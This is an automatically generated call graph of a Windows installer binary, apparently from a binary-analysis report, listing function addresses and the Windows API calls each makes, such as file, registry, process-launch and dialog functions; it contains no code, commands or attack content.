4336 4057cc 4334->4336 4335->4336 4337 4057df SetFileSecurityW 4335->4337 4336->4320 4337->4336 4338 4057f5 GetLastError 4337->4338 4338->4336 4340 4052b0 24 API calls 4339->4340 4341 401431 4340->4341 4342 40624c lstrcpynW 4341->4342 4342->4328 4344 405810 GetLastError 4343->4344 4345 40580c 4343->4345 4344->4345 4345->4320 4347 406642 4346->4347 4348 40664c GetProcAddress 4346->4348 4352 4065b6 GetSystemDirectoryW 4347->4352 4350 405820 4348->4350 4350->4320 4351 406648 4351->4348 4351->4350 4353 4065d8 wsprintfW LoadLibraryExW 4352->4353 4353->4351 4355 401e43 4363 402c15 4355->4363 4357 401e49 4358 402c15 17 API calls 4357->4358 4359 401e55 4358->4359 4360 401e61 ShowWindow 4359->4360 4361 401e6c EnableWindow 4359->4361 4362 402abf 4360->4362 4361->4362 4364 40626e 17 API calls 4363->4364 4365 402c2a 4364->4365 4365->4357 4370 402644 4371 402c15 17 API calls 4370->4371 4379 402653 4371->4379 4372 402790 4373 40269d ReadFile 4373->4372 4373->4379 4374 402736 4374->4372 4374->4379 4384 405e1f SetFilePointer 4374->4384 4375 405dc1 ReadFile 4375->4379 4377 402792 4393 406193 wsprintfW 4377->4393 4378 4026dd MultiByteToWideChar 4378->4379 4379->4372 4379->4373 4379->4374 4379->4375 4379->4377 4379->4378 4381 402703 SetFilePointer MultiByteToWideChar 4379->4381 4382 4027a3 4379->4382 4381->4379 4382->4372 4383 4027c4 SetFilePointer 4382->4383 4383->4372 4385 405e3b 4384->4385 4386 405e57 4384->4386 4387 405dc1 ReadFile 4385->4387 4386->4374 4388 405e47 4387->4388 4388->4386 4389 405e60 SetFilePointer 4388->4389 4390 405e88 SetFilePointer 4388->4390 4389->4390 4391 405e6b 4389->4391 4390->4386 4392 405df0 WriteFile 4391->4392 4392->4386 4393->4372 5171 402348 5172 402c37 17 API calls 5171->5172 5173 402357 5172->5173 5174 402c37 17 API calls 5173->5174 5175 402360 5174->5175 5176 402c37 17 API calls 5175->5176 5177 40236a GetPrivateProfileStringW 5176->5177 5188 4016cc 5189 402c37 17 API calls 5188->5189 5190 4016d2 GetFullPathNameW 5189->5190 5192 4016ec 5190->5192 5197 40170e 5190->5197 5191 401723 GetShortPathNameW 5193 402abf 5191->5193 5194 40658f 2 API calls 5192->5194 5192->5197 5195 4016fe 5194->5195 5195->5197 5198 40624c lstrcpynW 5195->5198 5197->5191 5197->5193 5198->5197 5199 401b4d 5200 402c37 17 API calls 5199->5200 5201 401b54 5200->5201 5202 402c15 17 API calls 5201->5202 5203 401b5d wsprintfW 5202->5203 5204 402abf 5203->5204 5205 401f52 5206 402c37 17 API calls 5205->5206 5207 401f59 5206->5207 5208 40658f 2 API calls 5207->5208 5209 401f5f 5208->5209 5211 401f70 5209->5211 5212 406193 wsprintfW 5209->5212 5212->5211 5213 402253 5214 402c37 17 API calls 5213->5214 5215 402259 5214->5215 5216 402c37 17 API calls 5215->5216 5217 402262 5216->5217 5218 402c37 17 API calls 5217->5218 5219 40226b 5218->5219 5220 40658f 2 API calls 5219->5220 5221 402274 5220->5221 5222 402285 lstrlenW lstrlenW 5221->5222 5226 402278 5221->5226 5224 4052b0 24 API calls 5222->5224 5223 4052b0 24 API calls 5227 402280 5223->5227 5225 4022c3 SHFileOperationW 5224->5225 5225->5226 5225->5227 5226->5223 5228 401956 5229 402c37 17 API calls 5228->5229 5230 40195d lstrlenW 5229->5230 5231 40258c 5230->5231 5232 406956 5234 4067da 5232->5234 5233 407145 5234->5233 5235 406864 GlobalAlloc 5234->5235 5236 40685b GlobalFree 5234->5236 5237 4068d2 GlobalFree 5234->5237 5238 4068db GlobalAlloc 5234->5238 5235->5233 5235->5234 5236->5235 5237->5238 5238->5233 5238->5234 4875 4014d7 4876 402c15 17 API calls 4875->4876 4877 4014dd Sleep 4876->4877 4879 402abf 4877->4879 5239 401d57 GetDlgItem GetClientRect 5240 402c37 17 API calls 5239->5240 5241 401d89 LoadImageW SendMessageW 5240->5241 5242 401da7 DeleteObject 5241->5242 5243 402abf 5241->5243 5242->5243 5244 4022d7 5245 4022f1 5244->5245 5246 4022de 5244->5246 5247 40626e 17 API calls 5246->5247 5248 4022eb 5247->5248 5249 4058ae MessageBoxIndirectW 5248->5249 5249->5245 5250 402dd7 5251 402e02 5250->5251 5252 402de9 SetTimer 5250->5252 5253 402e57 5251->5253 5254 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5251->5254 5252->5251 5254->5253 4880 40175c 4881 402c37 17 API calls 4880->4881 4882 401763 4881->4882 4886 405d6d 4882->4886 4884 40176a 4885 405d6d 2 API calls 4884->4885 4885->4884 4887 405d7a GetTickCount GetTempFileNameW 4886->4887 4888 405db0 4887->4888 4889 405db4 4887->4889 4888->4887 4888->4889 4889->4884 5132 4023de 5133 402c37 17 API calls 5132->5133 5134 4023f0 5133->5134 5135 402c37 17 API calls 5134->5135 5136 4023fa 5135->5136 5149 402cc7 5136->5149 5139 402432 5141 40243e 5139->5141 5144 402c15 17 API calls 5139->5144 5140 402c37 17 API calls 5143 402428 lstrlenW 5140->5143 5145 40245d RegSetValueExW 5141->5145 5146 4030fa 35 API calls 5141->5146 5142 402885 5143->5139 5144->5141 5147 402473 RegCloseKey 5145->5147 5146->5145 5147->5142 5150 402ce2 5149->5150 5153 4060e7 5150->5153 5154 4060f6 5153->5154 5155 406101 RegCreateKeyExW 5154->5155 5156 40240a 5154->5156 5155->5156 5156->5139 5156->5140 5156->5142 5262 402862 5263 402c37 17 API calls 5262->5263 5264 402869 FindFirstFileW 5263->5264 5265 402891 5264->5265 5268 40287c 5264->5268 5270 406193 wsprintfW 5265->5270 5267 40289a 5271 40624c lstrcpynW 5267->5271 5270->5267 5271->5268 5272 401563 5273 402a65 5272->5273 5276 406193 wsprintfW 5273->5276 5275 402a6a 5276->5275 5277 401968 5278 402c15 17 API calls 5277->5278 5279 40196f 5278->5279 5280 402c15 17 API calls 5279->5280 5281 40197c 5280->5281 5282 402c37 17 API calls 5281->5282 5283 401993 lstrlenW 5282->5283 5284 4019a4 5283->5284 5285 4019e5 5284->5285 5289 40624c lstrcpynW 5284->5289 5287 4019d5 5287->5285 5288 4019da lstrlenW 5287->5288 5288->5285 5289->5287 4543 4027e9 4544 4027f0 4543->4544 4547 402a6a 4543->4547 4545 402c15 17 API calls 4544->4545 4546 4027f7 4545->4546 4548 402806 SetFilePointer 4546->4548 4548->4547 4549 402816 4548->4549 4551 406193 wsprintfW 4549->4551 4551->4547 5290 404669 5291 404679 5290->5291 5292 40469f 5290->5292 5293 4041e1 18 API calls 5291->5293 5294 404248 8 API calls 5292->5294 5295 404686 SetDlgItemTextW 5293->5295 5296 4046ab 5294->5296 5295->5292 5297 100018a9 5298 100018cc 5297->5298 5299 100018ff GlobalFree 5298->5299 5300 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5298->5300 5299->5300 5301 10001272 2 API calls 5300->5301 5302 10001a87 GlobalFree GlobalFree 5301->5302 5303 40166a 5304 402c37 17 API calls 5303->5304 5305 401670 5304->5305 5306 40658f 2 API calls 5305->5306 5307 401676 5306->5307 5308 401ced 5309 402c15 17 API calls 5308->5309 5310 401cf3 IsWindow 5309->5310 5311 401a20 5310->5311 4729 40176f 4730 402c37 17 API calls 4729->4730 4731 401776 4730->4731 4732 401796 4731->4732 4733 40179e 4731->4733 4789 40624c lstrcpynW 4732->4789 4790 40624c lstrcpynW 4733->4790 4736 4017a9 4738 405b1d 3 API calls 4736->4738 4737 40179c 4740 4064e0 5 API calls 4737->4740 4739 4017af lstrcatW 4738->4739 4739->4737 4751 4017bb 4740->4751 4741 40658f 2 API calls 4741->4751 4743 405d19 2 API calls 4743->4751 4744 4017cd CompareFileTime 4744->4751 4745 40188d 4746 4052b0 24 API calls 4745->4746 4749 401897 4746->4749 4747 4052b0 24 API calls 4750 401879 4747->4750 4748 40624c lstrcpynW 4748->4751 4768 4030fa 4749->4768 4751->4741 4751->4743 4751->4744 4751->4745 4751->4748 4755 40626e 17 API calls 4751->4755 4766 401864 4751->4766 4767 405d3e GetFileAttributesW CreateFileW 4751->4767 4791 4058ae 4751->4791 4754 4018be SetFileTime 4756 4018d0 FindCloseChangeNotification 4754->4756 4755->4751 4756->4750 4757 4018e1 4756->4757 4758 4018e6 4757->4758 4759 4018f9 4757->4759 4760 40626e 17 API calls 4758->4760 4761 40626e 17 API calls 4759->4761 4762 4018ee lstrcatW 4760->4762 4763 401901 4761->4763 4762->4763 4765 4058ae MessageBoxIndirectW 4763->4765 4765->4750 4766->4747 4766->4750 4767->4751 4769 403113 4768->4769 4770 40313e 4769->4770 4805 4032f5 SetFilePointer 4769->4805 4795 4032df 4770->4795 4774 40315b GetTickCount 4777 40316e 4774->4777 4775 40327f 4776 403283 4775->4776 4782 40329b 4775->4782 4778 4032df ReadFile 4776->4778 4780 4018aa 4777->4780 4781 4032df ReadFile 4777->4781 4785 4031d4 GetTickCount 4777->4785 4786 4031fd MulDiv wsprintfW 4777->4786 4788 405df0 WriteFile 4777->4788 4798 4067a7 4777->4798 4778->4780 4779 4032df ReadFile 4779->4782 4780->4754 4780->4756 4781->4777 4782->4779 4782->4780 4783 405df0 WriteFile 4782->4783 4783->4782 4785->4777 4787 4052b0 24 API calls 4786->4787 4787->4777 4788->4777 4789->4737 4790->4736 4792 4058c3 4791->4792 4793 40590f 4792->4793 4794 4058d7 MessageBoxIndirectW 4792->4794 4793->4751 4794->4793 4796 405dc1 ReadFile 4795->4796 4797 403149 4796->4797 4797->4774 4797->4775 4797->4780 4799 4067cc 4798->4799 4800 4067d4 4798->4800 4799->4777 4800->4799 4801 406864 GlobalAlloc 4800->4801 4802 40685b GlobalFree 4800->4802 4803 4068d2 GlobalFree 4800->4803 4804 4068db GlobalAlloc 4800->4804 4801->4799 4801->4800 4802->4801 4803->4804 4804->4799 4804->4800 4805->4770 4806 4053ef 4807 405410 GetDlgItem GetDlgItem GetDlgItem 4806->4807 4808 405599 4806->4808 4852 404216 SendMessageW 4807->4852 4810 4055a2 GetDlgItem CreateThread FindCloseChangeNotification 4808->4810 4811 4055ca 4808->4811 4810->4811 4855 405383 OleInitialize 4810->4855 4812 4055f5 4811->4812 4813 4055e1 ShowWindow ShowWindow 4811->4813 4814 40561a 4811->4814 4815 405601 4812->4815 4817 405655 4812->4817 4854 404216 SendMessageW 4813->4854 4821 404248 8 API calls 4814->4821 4819 405609 4815->4819 4820 40562f ShowWindow 4815->4820 4816 405480 4822 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4816->4822 4817->4814 4825 405663 SendMessageW 4817->4825 4826 4041ba SendMessageW 4819->4826 4828 405641 4820->4828 4829 40564f 4820->4829 4827 405628 4821->4827 4823 4054f5 4822->4823 4824 4054d9 SendMessageW SendMessageW 4822->4824 4830 405508 4823->4830 4831 4054fa SendMessageW 4823->4831 4824->4823 4825->4827 4832 40567c CreatePopupMenu 4825->4832 4826->4814 4833 4052b0 24 API calls 4828->4833 4834 4041ba SendMessageW 4829->4834 4836 4041e1 18 API calls 4830->4836 4831->4830 4835 40626e 17 API calls 4832->4835 4833->4829 4834->4817 4837 40568c AppendMenuW 4835->4837 4838 405518 4836->4838 4839 4056a9 GetWindowRect 4837->4839 4840 4056bc TrackPopupMenu 4837->4840 4841 405521 ShowWindow 4838->4841 4842 405555 GetDlgItem SendMessageW 4838->4842 4839->4840 4840->4827 4843 4056d7 4840->4843 4844 405537 ShowWindow 4841->4844 4847 405544 4841->4847 4842->4827 4845 40557c SendMessageW SendMessageW 4842->4845 4846 4056f3 SendMessageW 4843->4846 4844->4847 4845->4827 4846->4846 4848 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4846->4848 4853 404216 SendMessageW 4847->4853 4850 405735 SendMessageW 4848->4850 4850->4850 4851 40575e GlobalUnlock SetClipboardData CloseClipboard 4850->4851 4851->4827 4852->4816 4853->4842 4854->4812 4856 40422d SendMessageW 4855->4856 4857 4053a6 4856->4857 4860 401389 2 API calls 4857->4860 4861 4053cd 4857->4861 4858 40422d SendMessageW 4859 4053df OleUninitialize 4858->4859 4860->4857 4861->4858 5312 402570 5313 402c37 17 API calls 5312->5313 5314 402577 5313->5314 5317 405d3e GetFileAttributesW CreateFileW 5314->5317 5316 402583 5317->5316 5318 401b71 5319 401bc2 5318->5319 5320 401b7e 5318->5320 5321 401bc7 5319->5321 5322 401bec GlobalAlloc 5319->5322 5323 401c07 5320->5323 5326 401b95 5320->5326 5333 4022f1 5321->5333 5339 40624c lstrcpynW 5321->5339 5325 40626e 17 API calls 5322->5325 5324 40626e 17 API calls 5323->5324 5323->5333 5327 4022eb 5324->5327 5325->5323 5337 40624c lstrcpynW 5326->5337 5332 4058ae MessageBoxIndirectW 5327->5332 5330 401bd9 GlobalFree 5330->5333 5331 401ba4 5338 40624c lstrcpynW 5331->5338 5332->5333 5335 401bb3 5340 40624c lstrcpynW 5335->5340 5337->5331 5338->5335 5339->5330 5340->5333 4862 4024f2 4863 402c77 17 API calls 4862->4863 4864 4024fc 4863->4864 4865 402c15 17 API calls 4864->4865 4866 402505 4865->4866 4867 402514 4866->4867 4872 402885 4866->4872 4868 402521 RegEnumKeyW 4867->4868 4869 40252d RegEnumValueW 4867->4869 4870 402549 RegCloseKey 4868->4870 4869->4870 4871 402542 4869->4871 4870->4872 4871->4870 5341 401a72 5342 402c15 17 API calls 5341->5342 5343 401a78 5342->5343 5344 402c15 17 API calls 5343->5344 5345 401a20 5344->5345 5346 401573 5347 401583 ShowWindow 5346->5347 5348 40158c 5346->5348 5347->5348 5349 40159a ShowWindow 5348->5349 5350 402abf 5348->5350 5349->5350 4874 405874 ShellExecuteExW 5351 4042f5 lstrcpynW lstrlenW 5352 4014f5 SetForegroundWindow 5353 402abf 5352->5353 5361 100016b6 5362 100016e5 5361->5362 5363 10001b18 20 API calls 5362->5363 5364 100016ec 5363->5364 5365 100016f3 5364->5365 5366 100016ff 5364->5366 5367 10001272 2 API calls 5365->5367 5368 10001726 5366->5368 5369 10001709 5366->5369 5370 100016fd 5367->5370 5372 10001750 5368->5372 5373 1000172c 5368->5373 5371 1000153d 3 API calls 5369->5371 5375 1000170e 5371->5375 5374 1000153d 3 API calls 5372->5374 5376 100015b4 3 API calls 5373->5376 5374->5370 5377 100015b4 3 API calls 5375->5377 5378 10001731 5376->5378 5379 10001714 5377->5379 5380 10001272 2 API calls 5378->5380 5382 10001272 2 API calls 5379->5382 5381 10001737 GlobalFree 5380->5381 5381->5370 5383 1000174b GlobalFree 5381->5383 5384 1000171a GlobalFree 5382->5384 5383->5370 5384->5370 5385 401e77 5386 402c37 17 API calls 5385->5386 5387 401e7d 5386->5387 5388 402c37 17 API calls 5387->5388 5389 401e86 5388->5389 5390 402c37 17 API calls 5389->5390 5391 401e8f 5390->5391 5392 402c37 17 API calls 5391->5392 5393 401e98 5392->5393 5394 401423 24 API calls 5393->5394 5395 401e9f 5394->5395 5402 405874 ShellExecuteExW 5395->5402 5397 401ee1 5398 4066d7 5 API calls 5397->5398 5399 402885 5397->5399 5400 401efb CloseHandle 5398->5400 5400->5399 5402->5397 5403 10002238 5404 10002296 5403->5404 5406 100022cc 5403->5406 5405 100022a8 GlobalAlloc 5404->5405 5404->5406 5405->5404 5407 40167b 5408 402c37 17 API calls 5407->5408 5409 401682 5408->5409 5410 402c37 17 API calls 5409->5410 5411 40168b 5410->5411 5412 402c37 17 API calls 5411->5412 5413 401694 MoveFileW 5412->5413 5414 4016a7 5413->5414 5420 4016a0 5413->5420 5415 40658f 2 API calls 5414->5415 5417 40224a 5414->5417 5418 4016b6 5415->5418 5416 401423 24 API calls 5416->5417 5418->5417 5419 406012 36 API calls 5418->5419 5419->5420 5420->5416 5421 1000103d 5422 1000101b 5 API calls 5421->5422 5423 10001056 5422->5423 5120 40247e 5121 402c77 17 API calls 5120->5121 5122 402488 5121->5122 5123 402c37 17 API calls 5122->5123 5124 402491 5123->5124 5125 40249c RegQueryValueExW 5124->5125 5129 402885 5124->5129 5126 4024bc 5125->5126 5127 4024c2 RegCloseKey 5125->5127 5126->5127 5131 406193 wsprintfW 5126->5131 5127->5129 5131->5127 5424 40437e 5425 404396 5424->5425 5429 4044b0 5424->5429 5430 4041e1 18 API calls 5425->5430 5426 40451a 5427 4045e4 5426->5427 5428 404524 GetDlgItem 5426->5428 5435 404248 8 API calls 5427->5435 5431 4045a5 5428->5431 5432 40453e 5428->5432 5429->5426 5429->5427 5433 4044eb GetDlgItem SendMessageW 5429->5433 5434 4043fd 5430->5434 5431->5427 5438 4045b7 5431->5438 5432->5431 5437 404564 SendMessageW LoadCursorW SetCursor 5432->5437 5457 404203 KiUserCallbackDispatcher 5433->5457 5440 4041e1 18 API calls 5434->5440 5436 4045df 5435->5436 5461 40462d 5437->5461 5442 4045cd 5438->5442 5443 4045bd SendMessageW 5438->5443 5445 40440a CheckDlgButton 5440->5445 5442->5436 5447 4045d3 SendMessageW 5442->5447 5443->5442 5444 404515 5458 404609 5444->5458 5455 404203 KiUserCallbackDispatcher 5445->5455 5447->5436 5450 404428 GetDlgItem 5456 404216 SendMessageW 5450->5456 5452 40443e SendMessageW 5453 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5452->5453 5454 40445b GetSysColor 5452->5454 5453->5436 5454->5453 5455->5450 5456->5452 5457->5444 5459 404617 5458->5459 5460 40461c SendMessageW 5458->5460 5459->5460 5460->5426 5464 405874 ShellExecuteExW 5461->5464 5463 404593 LoadCursorW SetCursor 5463->5431 5464->5463 5465 4020fe 5466 402c37 17 API calls 5465->5466 5467 402105 5466->5467 5468 402c37 17 API calls 5467->5468 5469 40210f 5468->5469 5470 402c37 17 API calls 5469->5470 5471 402119 5470->5471 5472 402c37 17 API calls 5471->5472 5473 402123 5472->5473 5474 402c37 17 API calls 5473->5474 5475 40212d 5474->5475 5476 40216c CoCreateInstance 5475->5476 5477 402c37 17 API calls 5475->5477 5480 40218b 5476->5480 5477->5476 5478 401423 24 API calls 5479 40224a 5478->5479 5480->5478 5480->5479 5481 4019ff 5482 402c37 17 API calls 5481->5482 5483 401a06 5482->5483 5484 402c37 17 API calls 5483->5484 5485 401a0f 5484->5485 5486 401a16 lstrcmpiW 5485->5486 5487 401a28 lstrcmpW 5485->5487 5488 401a1c 5486->5488 5487->5488 4094 401f00 4109 402c37 4094->4109 4101 401f39 CloseHandle 4105 402885 4101->4105 4104 401f2b 4106 401f30 4104->4106 4107 401f3b 4104->4107 4134 406193 wsprintfW 4106->4134 4107->4101 4110 402c43 4109->4110 4135 40626e 4110->4135 4113 401f06 4115 4052b0 4113->4115 4116 4052cb 4115->4116 4117 401f10 4115->4117 4118 4052e7 lstrlenW 4116->4118 4121 40626e 17 API calls 4116->4121 4126 405831 CreateProcessW 4117->4126 4119 405310 4118->4119 4120 4052f5 lstrlenW 4118->4120 4123 405323 4119->4123 4124 405316 SetWindowTextW 4119->4124 4120->4117 4122 405307 lstrcatW 4120->4122 4121->4118 4122->4119 4123->4117 4125 405329 SendMessageW SendMessageW SendMessageW 4123->4125 4124->4123 4125->4117 4127 401f16 4126->4127 4128 405864 CloseHandle 4126->4128 4127->4101 4127->4105 4129 4066d7 WaitForSingleObject 4127->4129 4128->4127 4130 4066f1 4129->4130 4131 406703 GetExitCodeProcess 4130->4131 4177 406662 4130->4177 4131->4104 4134->4101 4148 40627b 4135->4148 4136 4064c6 4137 402c64 4136->4137 4168 40624c lstrcpynW 4136->4168 4137->4113 4152 4064e0 4137->4152 4139 406494 lstrlenW 4139->4148 4142 40626e 10 API calls 4142->4139 4144 4063a9 GetSystemDirectoryW 4144->4148 4145 4063bc GetWindowsDirectoryW 4145->4148 4146 4064e0 5 API calls 4146->4148 4147 4063f0 SHGetSpecialFolderLocation 4147->4148 4151 406408 SHGetPathFromIDListW CoTaskMemFree 4147->4151 4148->4136 4148->4139 4148->4142 4148->4144 4148->4145 4148->4146 4148->4147 4149 40626e 10 API calls 4148->4149 4150 406437 lstrcatW 4148->4150 4161 40611a 4148->4161 4166 406193 wsprintfW 4148->4166 4167 40624c lstrcpynW 4148->4167 4149->4148 4150->4148 4151->4148 4159 4064ed 4152->4159 4153 406563 4154 406568 CharPrevW 4153->4154 4156 406589 4153->4156 4154->4153 4155 406556 CharNextW 4155->4153 4155->4159 4156->4113 4158 406542 CharNextW 4158->4159 4159->4153 4159->4155 4159->4158 4160 406551 CharNextW 4159->4160 4173 405b4a 4159->4173 4160->4155 4169 4060b9 4161->4169 4164 40617e 4164->4148 4165 40614e RegQueryValueExW RegCloseKey 4165->4164 4166->4148 4167->4148 4168->4137 4170 4060c8 4169->4170 4171 4060d1 RegOpenKeyExW 4170->4171 4172 4060cc 4170->4172 4171->4172 4172->4164 4172->4165 4174 405b50 4173->4174 4175 405b66 4174->4175 4176 405b57 CharNextW 4174->4176 4175->4159 4176->4174 4178 40667f PeekMessageW 4177->4178 4179 406675 DispatchMessageW 4178->4179 4180 40668f WaitForSingleObject 4178->4180 4179->4178 4180->4130 5489 401000 5490 401037 BeginPaint GetClientRect 5489->5490 5491 40100c DefWindowProcW 5489->5491 5493 4010f3 5490->5493 5494 401179 5491->5494 5495 401073 CreateBrushIndirect FillRect DeleteObject 5493->5495 5496 4010fc 5493->5496 5495->5493 5497 401102 CreateFontIndirectW 5496->5497 5498 401167 EndPaint 5496->5498 5497->5498 5499 401112 6 API calls 5497->5499 5498->5494 5499->5498 5500 401503 5501 40150b 5500->5501 5503 40151e 5500->5503 5502 402c15 17 API calls 5501->5502 5502->5503 4394 402306 4395 402314 4394->4395 4396 40230e 4394->4396 4398 402c37 17 API calls 4395->4398 4400 402322 4395->4400 4397 402c37 17 API calls 4396->4397 4397->4395 4398->4400 4399 402330 4402 402c37 17 API calls 4399->4402 4400->4399 4401 402c37 17 API calls 4400->4401 4401->4399 4403 402339 WritePrivateProfileStringW 4402->4403 5504 404a06 5505 404a32 5504->5505 5506 404a16 5504->5506 5508 404a65 5505->5508 5509 404a38 SHGetPathFromIDListW 5505->5509 5515 405892 GetDlgItemTextW 5506->5515 5511 404a4f SendMessageW 5509->5511 5512 404a48 5509->5512 5510 404a23 SendMessageW 5510->5505 5511->5508 5513 40140b 2 API calls 5512->5513 5513->5511 5515->5510 5516 401f86 5517 402c37 17 API calls 5516->5517 5518 401f8d 5517->5518 5519 406626 5 API calls 5518->5519 5520 401f9c 5519->5520 5521 401fb8 GlobalAlloc 5520->5521 5522 402020 5520->5522 5521->5522 5523 401fcc 5521->5523 5524 406626 5 API calls 5523->5524 5525 401fd3 5524->5525 5526 406626 5 API calls 5525->5526 5527 401fdd 5526->5527 5527->5522 5531 406193 wsprintfW 5527->5531 5529 402012 5532 406193 wsprintfW 5529->5532 5531->5529 5532->5522 4404 403d08 4405 403d20 4404->4405 4406 403e5b 4404->4406 4405->4406 4407 403d2c 4405->4407 4408 403eac 4406->4408 4409 403e6c GetDlgItem GetDlgItem 4406->4409 4410 403d37 SetWindowPos 4407->4410 4411 403d4a 4407->4411 4413 403f06 4408->4413 4421 401389 2 API calls 4408->4421 4475 4041e1 4409->4475 4410->4411 4414 403d67 4411->4414 4415 403d4f ShowWindow 4411->4415 4435 403e56 4413->4435 4481 40422d 4413->4481 4418 403d89 4414->4418 4419 403d6f DestroyWindow 4414->4419 4415->4414 4416 403e96 KiUserCallbackDispatcher 4478 40140b 4416->4478 4422 403d8e SetWindowLongW 4418->4422 4423 403d9f 4418->4423 4474 40416a 4419->4474 4424 403ede 4421->4424 4422->4435 4427 403e48 4423->4427 4428 403dab GetDlgItem 4423->4428 4424->4413 4429 403ee2 SendMessageW 4424->4429 4425 40140b 2 API calls 4431 403f18 4425->4431 4426 40416c DestroyWindow EndDialog 4426->4474 4497 404248 4427->4497 4432 403ddb 4428->4432 4433 403dbe SendMessageW IsWindowEnabled 4428->4433 4429->4435 4430 40419b ShowWindow 4430->4435 4431->4425 4431->4426 4431->4435 4436 40626e 17 API calls 4431->4436 4447 4041e1 18 API calls 4431->4447 4449 4041e1 18 API calls 4431->4449 4465 4040ac DestroyWindow 4431->4465 4437 403de0 4432->4437 4438 403de8 4432->4438 4439 403dfb 4432->4439 4440 403e2f SendMessageW 4432->4440 4433->4432 4433->4435 4436->4431 4494 4041ba 4437->4494 4438->4437 4438->4440 4442 403e03 4439->4442 4443 403e18 4439->4443 4440->4427 4445 40140b 2 API calls 4442->4445 4446 40140b 2 API calls 4443->4446 4444 403e16 4444->4427 4445->4437 4448 403e1f 4446->4448 4447->4431 4448->4427 4448->4437 4450 403f93 GetDlgItem 4449->4450 4451 403fb0 ShowWindow KiUserCallbackDispatcher 4450->4451 4452 403fa8 4450->4452 4484 404203 KiUserCallbackDispatcher 4451->4484 4452->4451 4454 403fda EnableWindow 4459 403fee 4454->4459 4455 403ff3 GetSystemMenu EnableMenuItem SendMessageW 4456 404023 SendMessageW 4455->4456 4455->4459 4456->4459 4459->4455 4485 404216 SendMessageW 4459->4485 4486 403ce9 4459->4486 4489 40624c lstrcpynW 4459->4489 4461 404052 lstrlenW 4462 40626e 17 API calls 4461->4462 4463 404068 SetWindowTextW 4462->4463 4490 401389 4463->4490 4466 4040c6 CreateDialogParamW 4465->4466 4465->4474 4467 4040f9 4466->4467 4466->4474 4468 4041e1 18 API calls 4467->4468 4469 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4468->4469 4470 401389 2 API calls 4469->4470 4471 40414a 4470->4471 4471->4435 4472 404152 ShowWindow 4471->4472 4473 40422d SendMessageW 4472->4473 4473->4474 4474->4430 4474->4435 4476 40626e 17 API calls 4475->4476 4477 4041ec SetDlgItemTextW 4476->4477 4477->4416 4479 401389 2 API calls 4478->4479 4480 401420 4479->4480 4480->4408 4482 404245 4481->4482 4483 404236 SendMessageW 4481->4483 4482->4431 4483->4482 4484->4454 4485->4459 4487 40626e 17 API calls 4486->4487 4488 403cf7 SetWindowTextW 4487->4488 4488->4459 4489->4461 4492 401390 4490->4492 4491 4013fe 4491->4431 4492->4491 4493 4013cb MulDiv SendMessageW 4492->4493 4493->4492 4495 4041c1 4494->4495 4496 4041c7 SendMessageW 4494->4496 4495->4496 4496->4444 4498 404260 GetWindowLongW 4497->4498 4508 4042e9 4497->4508 4499 404271 4498->4499 4498->4508 4500 404280 GetSysColor 4499->4500 4501 404283 4499->4501 4500->4501 4502 404293 SetBkMode 4501->4502 4503 404289 SetTextColor 4501->4503 4504 4042b1 4502->4504 4505 4042ab GetSysColor 4502->4505 4503->4502 4506 4042c2 4504->4506 4507 4042b8 SetBkColor 4504->4507 4505->4504 4506->4508 4509 4042d5 DeleteObject 4506->4509 4510 4042dc CreateBrushIndirect 4506->4510 4507->4506 4508->4435 4509->4510 4510->4508 4511 402388 4512 402390 4511->4512 4513 4023bb 4511->4513 4523 402c77 4512->4523 4515 402c37 17 API calls 4513->4515 4517 4023c2 4515->4517 4528 402cf5 4517->4528 4518 4023a1 4520 402c37 17 API calls 4518->4520 4522 4023a8 RegDeleteValueW RegCloseKey 4520->4522 4521 4023cf 4522->4521 4524 402c37 17 API calls 4523->4524 4525 402c8e 4524->4525 4526 4060b9 RegOpenKeyExW 4525->4526 4527 402397 4526->4527 4527->4518 4527->4521 4529 402d0b 4528->4529 4530 402d21 4529->4530 4532 402d2a 4529->4532 4530->4521 4533 4060b9 RegOpenKeyExW 4532->4533 4534 402d58 4533->4534 4535 402d7e RegEnumKeyW 4534->4535 4536 402d95 RegCloseKey 4534->4536 4538 402db6 RegCloseKey 4534->4538 4540 402d2a 6 API calls 4534->4540 4542 402da9 4534->4542 4535->4534 4535->4536 4537 406626 5 API calls 4536->4537 4539 402da5 4537->4539 4538->4542 4541 402dc4 RegDeleteKeyW 4539->4541 4539->4542 4540->4534 4541->4542 4542->4530 5540 40190c 5541 401943 5540->5541 5542 402c37 17 API calls 5541->5542 5543 401948 5542->5543 5544 40595a 67 API calls 5543->5544 5545 401951 5544->5545 5553 401d0e 5554 402c15 17 API calls 5553->5554 5555 401d15 5554->5555 5556 402c15 17 API calls 5555->5556 5557 401d21 GetDlgItem 5556->5557 5558 40258c 5557->5558 5559 1000164f 5560 10001516 GlobalFree 5559->5560 5562 10001667 5560->5562 5561 100016ad GlobalFree 5562->5561 5563 10001682 5562->5563 5564 10001699 VirtualFree 5562->5564 5563->5561 5564->5561 5565 40190f 5566 402c37 17 API calls 5565->5566 5567 401916 5566->5567 5568 4058ae MessageBoxIndirectW 5567->5568 5569 40191f 5568->5569 5570 401491 5571 4052b0 24 API calls 5570->5571 5572 401498 5571->5572 5573 402592 5574 4025c1 5573->5574 5575 4025a6 5573->5575 5577 4025f5 5574->5577 5578 4025c6 5574->5578 5576 402c15 17 API calls 5575->5576 5579 4025ad 5576->5579 5581 402c37 17 API calls 5577->5581 5580 402c37 17 API calls 5578->5580 5584 402629 5579->5584 5586 405e1f 5 API calls 5579->5586 5587 40263f 5579->5587 5582 4025cd WideCharToMultiByte lstrlenA 5580->5582 5583 4025fc lstrlenW 5581->5583 5582->5579 5583->5579 5585 405df0 WriteFile 5584->5585 5584->5587 5585->5587 5586->5584 5595 10001058 5597 10001074 5595->5597 5596 100010dd 5597->5596 5598 10001092 5597->5598 5599 10001516 GlobalFree 5597->5599 5600 10001516 GlobalFree 5598->5600 5599->5598 5601 100010a2 5600->5601 5602 100010b2 5601->5602 5603 100010a9 GlobalSize 5601->5603 5604 100010b6 GlobalAlloc 5602->5604 5606 100010c7 5602->5606 5603->5602 5605 1000153d 3 API calls 5604->5605 5605->5606 5607 100010d2 GlobalFree 5606->5607 5607->5596 5608 403918 5609 403923 5608->5609 5610 403927 5609->5610 5611 40392a GlobalAlloc 5609->5611 